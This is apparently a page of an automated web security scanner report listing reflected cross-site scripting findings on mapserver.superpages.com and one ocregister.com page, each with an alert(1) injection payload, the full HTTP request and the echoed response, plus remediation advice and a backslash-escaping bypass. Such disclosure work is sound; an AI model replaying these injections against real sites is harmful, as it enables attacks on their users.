Date: Thu, 03 Feb 2011 19:07:25 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://letters.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:07:25 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53258

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
l="alternate" type="application/rss+xml" title=" Page not found - Letters to the Editor - www.ocregister.com" href="http://letters.ocregister.com/2011/02/02/egyptian-revolution-could-bring-u-s-trouble2b12b\"><script>alert(1)</script>29a0ab24421feed/" />
...[SNIP]...

1.194. http://mapserver.superpages.com/mapbasedsearch/ [&SRC parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mapserver.superpages.com
Path:   /mapbasedsearch/

Issue detail

The value of the &SRC request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e0186"%3balert(1)//4a2e6a0ce5b was submitted in the &SRC parameter. This input was echoed as e0186";alert(1)//4a2e6a0ce5b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mapbasedsearch/?&SRC=comlocal1ae0186"%3balert(1)//4a2e6a0ce5b&C=banks&L=19101&CS=L&MCBP=true&C=Banks&STYPE=S&PS=15&search=Find+It HTTP/1.1
Host: mapserver.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_lastvisit=1296748870245; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;

Response

HTTP/1.1 200 OK
Server: Unspecified
Set-Cookie: JSESSIONID=0A0D8557B1084404AFE23DD0AF0AF253; Path=/mapbasedsearch
Set-Cookie: spLocalHost=http://mapserver.superpages.com/mapbasedsearch/
Content-Type: text/html
Date: Thu, 03 Feb 2011 16:22:46 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<title></title>
<meta http
...[SNIP]...
window.locale = 'en-us';
var token = "RGBdU6R4GBImcYmepJZCuPc-P0ApKvan6CIRb_VBHpv7BOlE5AlS1J65xSZmZSy3C-3K_wv_hUyFJXQWMj1bvQ2";

var spHeader=false;
var cobrand="comlocal1ae0186";alert(1)//4a2e6a0ce5b";
var spYPC="";
var spPGID="";
var spOF="";
var spLid="";
var spBid="";
var spCampaignId="";
var spOnAMap=false;
var spC="banks";
var TopMostSW=false;
var spMS2=false;
var spLid2="";
var spBid2="";
va
...[SNIP]...

1.195. http://mapserver.superpages.com/mapbasedsearch/ [&spheader parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mapserver.superpages.com
Path:   /mapbasedsearch/

Issue detail

The value of the &spheader request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b305f"-alert(1)-"5b1a94486f6 was submitted in the &spheader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mapbasedsearch/?&spheader=trueb305f"-alert(1)-"5b1a94486f6& HTTP/1.1
Host: mapserver.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=78A519C6EB88961EA09FA2CFC9F74D50; __unam=c5114f2-12dec4b1cc4-7f15d273-1; SPC=1296748823650-www.superpages.com-30323935-794472; s_sq=%5B%5BB%5D%5D; s_ppv=100; web=; s_cc=true; s_lastvisit=1296754109045; s_vi=[CS]v1|26A56898051D3E94-40000129001DB9DD[CE]; yp=; s_dfa=superpagescom; spLocalHost=http://mapserver.superpages.com/mapbasedsearch/; shopping=; s.campaign=comlocal1a; s_pv=Maps;

Response

HTTP/1.1 200 OK
Server: Unspecified
Set-Cookie: JSESSIONID=E5BF135AD9937E6B27515B002A95E5A6; Path=/mapbasedsearch
Set-Cookie: spLocalHost=http://mapserver.superpages.com/mapbasedsearch/
Content-Type: text/html
Date: Thu, 03 Feb 2011 19:07:42 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<title></title>
<meta http
...[SNIP]...
= null;
// TEST: that this is returning what's expected
           var spReferer = false;
           var spDomain = "superpages.com";

           var spUrl = "http://mapserver.superpages.com/mapbasedsearch/?&spheader=trueb305f"-alert(1)-"5b1a94486f6&";

           var fbRedirectUri = "http://yellowpages.superpages.com/Facebook?prev=map";

           var fbClientId = "133515049997773";

</script>
...[SNIP]...

1.196. http://mapserver.superpages.com/mapbasedsearch/ [C parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mapserver.superpages.com
Path:   /mapbasedsearch/

Issue detail

The value of the C request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 415ee"%3balert(1)//7f39f412a8d was submitted in the C parameter. This input was echoed as 415ee";alert(1)//7f39f412a8d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mapbasedsearch/?&SRC=comlocal1a&C=banks415ee"%3balert(1)//7f39f412a8d&L=19101&CS=L&MCBP=true&C=Banks&STYPE=S&PS=15&search=Find+It HTTP/1.1
Host: mapserver.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_lastvisit=1296748870245; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;

Response

HTTP/1.1 200 OK
Server: Unspecified
Set-Cookie: JSESSIONID=C1BB2C6D5F2026531BC42BC6B8F4DFAC; Path=/mapbasedsearch
Set-Cookie: spLocalHost=http://mapserver.superpages.com/mapbasedsearch/
Content-Type: text/html
Date: Thu, 03 Feb 2011 16:22:58 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<title></title>
<meta http
...[SNIP]...
yFJXQWMj1bvQ2";

var spHeader=false;
var cobrand="comlocal1a";
var spYPC="";
var spPGID="";
var spOF="";
var spLid="";
var spBid="";
var spCampaignId="";
var spOnAMap=false;
var spC="banks415ee";alert(1)//7f39f412a8d";
var TopMostSW=false;
var spMS2=false;
var spLid2="";
var spBid2="";
var spCampaignId2="";
var singleQuery2="";
var spType2="";
var spOnAMap2=null;
var spC2="";
var spZoom=4;
var spStyle="r";
var spD
...[SNIP]...

1.197. http://mapserver.superpages.com/mapbasedsearch/ [CS parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mapserver.superpages.com
Path:   /mapbasedsearch/

Issue detail

The value of the CS request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a5aa7"-alert(1)-"e8f7aa23d76 was submitted in the CS parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mapbasedsearch/?&SRC=comlocal1a&C=banks&L=19101&CS=La5aa7"-alert(1)-"e8f7aa23d76&MCBP=true&C=Banks&STYPE=S&PS=15&search=Find+It HTTP/1.1
Host: mapserver.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_lastvisit=1296748870245; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;

Response

HTTP/1.1 200 OK
Server: Unspecified
Set-Cookie: JSESSIONID=8A6B3D73FBEBC1BA5FD4B23D5F55C05E; Path=/mapbasedsearch
Set-Cookie: spLocalHost=http://mapserver.superpages.com/mapbasedsearch/
Content-Type: text/html
Date: Thu, 03 Feb 2011 16:23:29 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<title></title>
<meta http
...[SNIP]...
this is returning what's expected
           var spReferer = false;
           var spDomain = "superpages.com";

           var spUrl = "http://mapserver.superpages.com/mapbasedsearch/?&SRC=comlocal1a&C=banks&L=19101&CS=La5aa7"-alert(1)-"e8f7aa23d76&MCBP=true&C=Banks&STYPE=S&PS=15&search=Find+It";

           var fbRedirectUri = "http://yellowpages.superpages.com/Facebook?prev=map";

           var fbClientId = "133515049997773";

</script>
...[SNIP]...

1.198. http://mapserver.superpages.com/mapbasedsearch/ [L parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mapserver.superpages.com
Path:   /mapbasedsearch/

Issue detail

The value of the L request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bbefb"%3balert(1)//638e573e1c7 was submitted in the L parameter. This input was echoed as bbefb";alert(1)//638e573e1c7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mapbasedsearch/?&SRC=comlocal1a&C=banks&L=19101bbefb"%3balert(1)//638e573e1c7&CS=L&MCBP=true&C=Banks&STYPE=S&PS=15&search=Find+It HTTP/1.1
Host: mapserver.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_lastvisit=1296748870245; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;

Response

HTTP/1.1 200 OK
Server: Unspecified
Set-Cookie: JSESSIONID=0455C57151DFDC39EEC6EB920F1CE002; Path=/mapbasedsearch
Set-Cookie: spLocalHost=http://mapserver.superpages.com/mapbasedsearch/
Content-Type: text/html
Date: Thu, 03 Feb 2011 16:23:11 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<title></title>
<meta http
...[SNIP]...
S2=false;
var spLid2="";
var spBid2="";
var spCampaignId2="";
var singleQuery2="";
var spType2="";
var spOnAMap2=null;
var spC2="";
var spZoom=4;
var spStyle="r";
var spDD = false;
var spAddress="19101bbefb";alert(1)//638e573e1c7";
var spStartAddress="";
var spTraffic = false;
var spBeId = false;
var spLat = null;
var spLon = null;
var spStartLocation = true;

var spc_lat = null;
var spc_long = null;
...[SNIP]...

1.199. http://mapserver.superpages.com/mapbasedsearch/ [MCBP parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mapserver.superpages.com
Path:   /mapbasedsearch/

Issue detail

The value of the MCBP request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fed48"-alert(1)-"1cd3186e2fd was submitted in the MCBP parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mapbasedsearch/?&SRC=comlocal1a&C=banks&L=19101&CS=L&MCBP=truefed48"-alert(1)-"1cd3186e2fd&C=Banks&STYPE=S&PS=15&search=Find+It HTTP/1.1
Host: mapserver.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_lastvisit=1296748870245; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;

Response

HTTP/1.1 200 OK
Server: Unspecified
Set-Cookie: JSESSIONID=F434BBA89E81451FADCF2C4BAF96B9DD; Path=/mapbasedsearch
Set-Cookie: spLocalHost=http://mapserver.superpages.com/mapbasedsearch/
Content-Type: text/html
Date: Thu, 03 Feb 2011 16:23:42 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<title></title>
<meta http
...[SNIP]...
eturning what's expected
           var spReferer = false;
           var spDomain = "superpages.com";

           var spUrl = "http://mapserver.superpages.com/mapbasedsearch/?&SRC=comlocal1a&C=banks&L=19101&CS=L&MCBP=truefed48"-alert(1)-"1cd3186e2fd&C=Banks&STYPE=S&PS=15&search=Find+It";

           var fbRedirectUri = "http://yellowpages.superpages.com/Facebook?prev=map";

           var fbClientId = "133515049997773";

</script>
...[SNIP]...

1.200. http://mapserver.superpages.com/mapbasedsearch/ [PS parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mapserver.superpages.com
Path:   /mapbasedsearch/

Issue detail

The value of the PS request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 242c7"-alert(1)-"6e00a234b00 was submitted in the PS parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mapbasedsearch/?&SRC=comlocal1a&C=banks&L=19101&CS=L&MCBP=true&C=Banks&STYPE=S&PS=15242c7"-alert(1)-"6e00a234b00&search=Find+It HTTP/1.1
Host: mapserver.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_lastvisit=1296748870245; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;

Response

HTTP/1.1 200 OK
Server: Unspecified
Set-Cookie: JSESSIONID=9139837C423FB41FB7994B9F30753C27; Path=/mapbasedsearch
Set-Cookie: spLocalHost=http://mapserver.superpages.com/mapbasedsearch/
Content-Type: text/html
Date: Thu, 03 Feb 2011 16:24:17 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<title></title>
<meta http
...[SNIP]...
ed
           var spReferer = false;
           var spDomain = "superpages.com";

           var spUrl = "http://mapserver.superpages.com/mapbasedsearch/?&SRC=comlocal1a&C=banks&L=19101&CS=L&MCBP=true&C=Banks&STYPE=S&PS=15242c7"-alert(1)-"6e00a234b00&search=Find+It";

           var fbRedirectUri = "http://yellowpages.superpages.com/Facebook?prev=map";

           var fbClientId = "133515049997773";

</script>
...[SNIP]...

1.201. http://mapserver.superpages.com/mapbasedsearch/ [SRC parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mapserver.superpages.com
Path:   /mapbasedsearch/

Issue detail

The value of the SRC request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1e454"%3balert(1)//a5898f77f83 was submitted in the SRC parameter. This input was echoed as 1e454";alert(1)//a5898f77f83 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mapbasedsearch/?&spheader=true&L=&SRC=bpo1e454"%3balert(1)//a5898f77f83 HTTP/1.1
Host: mapserver.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=78A519C6EB88961EA09FA2CFC9F74D50; __unam=c5114f2-12dec4b1cc4-7f15d273-1; SPC=1296748823650-www.superpages.com-30323935-794472; s_sq=%5B%5BB%5D%5D; s_ppv=100; web=; s_cc=true; s_lastvisit=1296754109045; s_vi=[CS]v1|26A56898051D3E94-40000129001DB9DD[CE]; yp=; s_dfa=superpagescom; spLocalHost=http://mapserver.superpages.com/mapbasedsearch/; shopping=; s.campaign=comlocal1a; s_pv=Maps;

Response

HTTP/1.1 200 OK
Server: Unspecified
Set-Cookie: JSESSIONID=117A4533D55B610A1C95579E212D0972; Path=/mapbasedsearch
Set-Cookie: spLocalHost=http://mapserver.superpages.com/mapbasedsearch/
Content-Type: text/html
Date: Thu, 03 Feb 2011 19:07:57 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<title></title>
<meta http
...[SNIP]...
window.locale = 'en-us';
var token = "p3QTbbHsCs-eeUFhvWJsTUVffL_Ir8TWNCsd-WpPTj7F6jKZTdTbkF_H-pfUpTkqszv1R7ui7FAHG-ONafiS_w2";

var spHeader=true;
var cobrand="bpo1e454";alert(1)//a5898f77f83";
var spYPC="";
var spPGID="";
var spOF="";
var spLid="";
var spBid="";
var spCampaignId="";
var spOnAMap=false;
var spC="";
var TopMostSW=false;
var spMS2=false;
var spLid2="";
var spBid2="";
var spC
...[SNIP]...

1.202. http://mapserver.superpages.com/mapbasedsearch/ [STYPE parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mapserver.superpages.com
Path:   /mapbasedsearch/

Issue detail

The value of the STYPE request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3bc58"-alert(1)-"d4e5aaa0292 was submitted in the STYPE parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mapbasedsearch/?&SRC=comlocal1a&C=banks&L=19101&CS=L&MCBP=true&C=Banks&STYPE=S3bc58"-alert(1)-"d4e5aaa0292&PS=15&search=Find+It HTTP/1.1
Host: mapserver.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_lastvisit=1296748870245; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;

Response

HTTP/1.1 200 OK
Server: Unspecified
Set-Cookie: JSESSIONID=7AD460510827A183B38F52F6C40DBEE4; Path=/mapbasedsearch
Set-Cookie: spLocalHost=http://mapserver.superpages.com/mapbasedsearch/
Content-Type: text/html
Date: Thu, 03 Feb 2011 16:24:05 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<title></title>
<meta http
...[SNIP]...
expected
           var spReferer = false;
           var spDomain = "superpages.com";

           var spUrl = "http://mapserver.superpages.com/mapbasedsearch/?&SRC=comlocal1a&C=banks&L=19101&CS=L&MCBP=true&C=Banks&STYPE=S3bc58"-alert(1)-"d4e5aaa0292&PS=15&search=Find+It";

           var fbRedirectUri = "http://yellowpages.superpages.com/Facebook?prev=map";

           var fbClientId = "133515049997773";

</script>
...[SNIP]...

1.203. http://mapserver.superpages.com/mapbasedsearch/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mapserver.superpages.com
Path:   /mapbasedsearch/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 486fb"-alert(1)-"cf09a8c6088 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mapbasedsearch/?486fb"-alert(1)-"cf09a8c6088=1 HTTP/1.1
Host: mapserver.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_lastvisit=1296748870245; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;

Response

HTTP/1.1 200 OK
Server: Unspecified
Set-Cookie: JSESSIONID=F0CC14DC558B2EE853A42B486D028978; Path=/mapbasedsearch
Set-Cookie: spLocalHost=http://mapserver.superpages.com/mapbasedsearch/
Content-Type: text/html
Date: Thu, 03 Feb 2011 16:23:29 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<title></title>
<meta http
...[SNIP]...
var spc_long = null;
// TEST: that this is returning what's expected
           var spReferer = false;
           var spDomain = "superpages.com";

           var spUrl = "http://mapserver.superpages.com/mapbasedsearch/?486fb"-alert(1)-"cf09a8c6088=1";

           var fbRedirectUri = "http://yellowpages.superpages.com/Facebook?prev=map";

           var fbClientId = "133515049997773";

</script>
...[SNIP]...

1.204. http://mapserver.superpages.com/mapbasedsearch/ [search parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mapserver.superpages.com
Path:   /mapbasedsearch/

Issue detail

The value of the search request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c9334"-alert(1)-"340f60da8f8 was submitted in the search parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mapbasedsearch/?&SRC=comlocal1a&C=banks&L=19101&CS=L&MCBP=true&C=Banks&STYPE=S&PS=15&search=Find+Itc9334"-alert(1)-"340f60da8f8 HTTP/1.1
Host: mapserver.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_lastvisit=1296748870245; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;

Response

HTTP/1.1 200 OK
Server: Unspecified
Set-Cookie: JSESSIONID=48CA725AE0BF7A03BE6E941C2CF30885; Path=/mapbasedsearch
Set-Cookie: spLocalHost=http://mapserver.superpages.com/mapbasedsearch/
Content-Type: text/html
Date: Thu, 03 Feb 2011 16:24:31 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<title></title>
<meta http
...[SNIP]...
ferer = false;
           var spDomain = "superpages.com";

           var spUrl = "http://mapserver.superpages.com/mapbasedsearch/?&SRC=comlocal1a&C=banks&L=19101&CS=L&MCBP=true&C=Banks&STYPE=S&PS=15&search=Find+Itc9334"-alert(1)-"340f60da8f8";

           var fbRedirectUri = "http://yellowpages.superpages.com/Facebook?prev=map";

           var fbClientId = "133515049997773";

</script>
...[SNIP]...

1.205. http://mapserver.superpages.com/mapbasedsearch/ [spheader parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mapserver.superpages.com
Path:   /mapbasedsearch/

Issue detail

The value of the spheader request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9124c"-alert(1)-"2c2736523e0 was submitted in the spheader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mapbasedsearch/?spheader=true9124c"-alert(1)-"2c2736523e0&L= HTTP/1.1
Host: mapserver.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=78A519C6EB88961EA09FA2CFC9F74D50; __unam=c5114f2-12dec4b1cc4-7f15d273-1; SPC=1296748823650-www.superpages.com-30323935-794472; s_sq=%5B%5BB%5D%5D; s_ppv=100; web=; s_cc=true; s_lastvisit=1296754109045; s_vi=[CS]v1|26A56898051D3E94-40000129001DB9DD[CE]; yp=; s_dfa=superpagescom; spLocalHost=http://mapserver.superpages.com/mapbasedsearch/; shopping=; s.campaign=comlocal1a; s_pv=Maps;

Response

HTTP/1.1 200 OK
Server: Unspecified
Set-Cookie: JSESSIONID=762E206D0334242828CD0BC99ACC410B; Path=/mapbasedsearch
Set-Cookie: spLocalHost=http://mapserver.superpages.com/mapbasedsearch/
Content-Type: text/html
Date: Thu, 03 Feb 2011 19:07:46 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<title></title>
<meta http
...[SNIP]...
= null;
// TEST: that this is returning what's expected
           var spReferer = false;
           var spDomain = "superpages.com";

           var spUrl = "http://mapserver.superpages.com/mapbasedsearch/?spheader=true9124c"-alert(1)-"2c2736523e0&L=";

           var fbRedirectUri = "http://yellowpages.superpages.com/Facebook?prev=map";

           var fbClientId = "133515049997773";

</script>
...[SNIP]...

1.206. http://mapserver.superpages.com/mapbasedsearch/spSearchProxyLight [FP parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mapserver.superpages.com
Path:   /mapbasedsearch/spSearchProxyLight

Issue detail

The value of the FP request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5bf14\'%3balert(1)//32bd7f650df was submitted in the FP parameter. This input was echoed as 5bf14\\';alert(1)//32bd7f650df in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /mapbasedsearch/spSearchProxyLight?app=sp&sw=1&i=1&a=banks&c=39.954484&d=-75.182068&r=1.010325&ppc=1&pi=0&FP=map5bf14\'%3balert(1)//32bd7f650df&cpc=true&SRC=MapBased HTTP/1.1
Host: mapserver.superpages.com
Proxy-Connection: keep-alive
Referer: http://mapserver.superpages.com/mapbasedsearch/?&SRC=comlocal1a&C=banks&L=19101&CS=La5aa7%22-alert(1)-%22e8f7aa23d76&MCBP=true&C=Banks&STYPE=S&PS=15&search=Find+It
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=8A6B3D73FBEBC1BA5FD4B23D5F55C05E; spLocalHost=http://mapserver.superpages.com/mapbasedsearch/; SPC=1296748823650-www.superpages.com-30323935-794472; s_vi=[CS]v1|26A56898051D3E94-40000129001DB9DD[CE]; __unam=c5114f2-12dec4b1cc4-7f15d273-1; web=; shopping=; yp=; s_lastvisit=1296751078074; s_cc=true; s.campaign=comlocal1a; s_pv=Maps; s_dfa=superpagescom; s_sq=%5B%5BB%5D%5D; s_ppv=100

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 18:58:34 GMT
Content-Length: 22659

